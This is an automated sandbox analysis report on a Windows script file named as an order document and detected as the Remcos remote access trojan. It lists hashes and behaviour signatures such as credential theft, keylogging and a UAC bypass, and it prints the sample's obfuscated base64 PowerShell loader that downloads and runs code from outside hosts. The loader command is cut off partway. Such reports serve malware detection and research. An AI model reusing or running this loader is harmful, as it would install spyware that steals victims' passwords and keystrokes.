Edit tour
Windows
Analysis Report
nr101612_Order.wsf
Overview
General Information
| Sample name: | nr101612_Order.wsf |
| Analysis ID: | 1567672 |
| MD5: | 2351b140cfa13f0cf05f93b471edd1f6 |
| SHA1: | aab24f356405a117ce7df0016b131872fb1b2f16 |
| SHA256: | 4e176fd538ca3aade9d71291f18cbe73022c88dd19e29fba250a6d0a9137be17 |
| Tags: | wsfuser-lowmal3 |
| Infos: |   |
 | |
Detection
Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected VBS Downloader Generic
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Opens the same file many times (likely Sandbox evasion)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6480 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\nr101 612_Order. wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6640 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $originado r = 'aWYgK CRudWxsIC1 uZSAkUFNWZ XJzaW9uVGF ibGUgLWFuZ CAkUFNWZXJ zaW9uVGFib GUuUFNWZXJ zaW9uIC1uZ SAkbnVsbCk geyBbdm9pZ F0kUFNWZXJ zaW9uVGFib GUuUFNWZXJ zaW9uIH0gZ WxzZSB7IFd yaXRlLU91d HB1dCAnUG9 3ZXJTaGVsb CB2ZXJzaW9 uIE5vdCBhd mFpbGFibGU nIH07aWYgK CRudWxsIC1 uZSAkUFNWZ XJzaW9uVGF ibGUgLWFuZ CAkUFNWZXJ zaW9uVGFib GUuUFNWZXJ zaW9uIC1uZ SAkbnVsbCk geyBbdm9pZ F0kUFNWZXJ zaW9uVGFib GUuUFNWZXJ zaW9uIH0gZ WxzZSB7IFd yaXRlLU91d HB1dCAnUG9 3ZXJTaGVsb CB2ZXJzaW9 uIE5vdCBhd mFpbGFibGU nIH07JGFud Gl2aXZpc3N lY2Npb25pc 3RhID0gJ2h 0dHBzOi8vc mVzLmNsb3V kaW5hcnkuY 29tL2R5dGZ sdDYxbi9pb WFnZS91cGx vYWQvdjE3M zMxMzQ5NDc vYmtscHlzZ XlldXQ0aW1 wdzUwbjEua nBnICc7JHB sdW1hY2hvI D0gTmV3LU9 iamVjdCBTe XN0ZW0uTmV 0LldlYkNsa WVudDskY29 udm9jYXIgP SAkcGx1bWF jaG8uRG93b mxvYWREYXR hKCRhbnRpd ml2aXNzZWN jaW9uaXN0Y Sk7JGFjY2V sZXJhdHJpe iA9IFtTeXN 0ZW0uVGV4d C5FbmNvZGl uZ106OlVUR jguR2V0U3R yaW5nKCRjb 252b2Nhcik 7JGNoaW5ja GFycmF2ZWx obyA9ICc8P EJBU0U2NF9 TVEFSVD4+J zskb2JjZWN hciA9ICc8P EJBU0U2NF9 FTkQ+Pic7J HRhc2NhciA 9ICRhY2Nlb GVyYXRyaXo uSW5kZXhPZ igkY2hpbmN oYXJyYXZlb GhvKTskbW9 jYW1iZWlyb yA9ICRhY2N lbGVyYXRya XouSW5kZXh PZigkb2JjZ WNhcik7JHR hc2NhciAtZ 2UgMCAtYW5 kICRtb2Nhb WJlaXJvIC1 ndCAkdGFzY 2FyOyR0YXN jYXIgKz0gJ GNoaW5jaGF ycmF2ZWxob y5MZW5ndGg 7JGFuZmljY XJwbyA9ICR tb2NhbWJla XJvIC0gJHR hc2NhcjskY WNhc3VzbyA 9ICRhY2Nlb GVyYXRyaXo uU3Vic3Rya W5nKCR0YXN jYXIsICRhb mZpY2FycG8 pOyRlc3R1Z mFkZWlyYSA 9IC1qb2luI CgkYWNhc3V zby5Ub0NoY XJBcnJheSg pIHwgRm9yR WFjaC1PYmp lY3QgeyAkX yB9KVstMS4 uLSgkYWNhc 3Vzby5MZW5 ndGgpXTskc Glhc3NhYmE gPSBbU3lzd GVtLkNvbnZ lcnRdOjpGc m9tQmFzZTY 0U3RyaW5nK CRlc3R1ZmF kZWlyYSk7J G1lZHVsYW5 0ZSA9IFtTe XN0ZW0uUmV mbGVjdGlvb i5Bc3NlbWJ seV06OkxvY WQoJHBpYXN zYWJhKTskZ 3JhZmljYW1 lbnRlID0gW 2RubGliLkl PLkhvbWVdL kdldE1ldGh vZCgnVkFJJ yk7JGdyYWZ pY2FtZW50Z S5JbnZva2U oJG51bGwsI EAoJzAvZUd wdU4vci9lZ S5ldHNhcC8 vOnNwdHRoJ ywgJ2JyYW5 kbycsICdic mFuZG8nLCA nYnJhbmRvJ ywgJ01TQnV pbGQnLCAnY nJhbmRvJyw gJ2JyYW5kb ycsJ2JyYW5 kbycsJ2JyY W5kbycsJ2J yYW5kbycsJ 2JyYW5kbyc sJ2JyYW5kb ycsJzEnLCd icmFuZG8nK Sk7aWYgKCR udWxsIC1uZ SAkUFNWZXJ zaW9uVGFib GUgLWFuZCA kUFNWZXJza W9uVGFibGU uUFNWZXJza W9uIC1uZSA kbnVsbCkge yBbdm9pZF0 kUFNWZXJza W9uVGFibGU uUFNWZXJza W9uIH0gZWx zZSB7IFdya XRlLU91dHB 1dCAnUG93Z XJTaGVsbCB 2ZXJzaW9uI E5vdCBhdmF pbGFibGUnI H07aWYgKCR udWxsIC1uZ SAkUFNWZXJ zaW9uVGFib GUgLWFuZCA kUFNWZXJza W9uVGFibGU uUFNWZXJza W9uIC1uZSA kbnVsbCkge yBbdm9pZF0 kUFNWZXJza W9uVGFibGU uUFNWZXJza W9uIH0gZWx zZSB7IFdya XRlLU91dHB 1dCAnUG93Z XJTaGVsbCB 2ZXJzaW9uI E5vdCBhdmF pbGFibGUnI H07';$aleg orista = [ System.Tex t.Encoding ]::UTF8.Ge tString([S ystem.Conv ert]::From Base64Stri ng($origin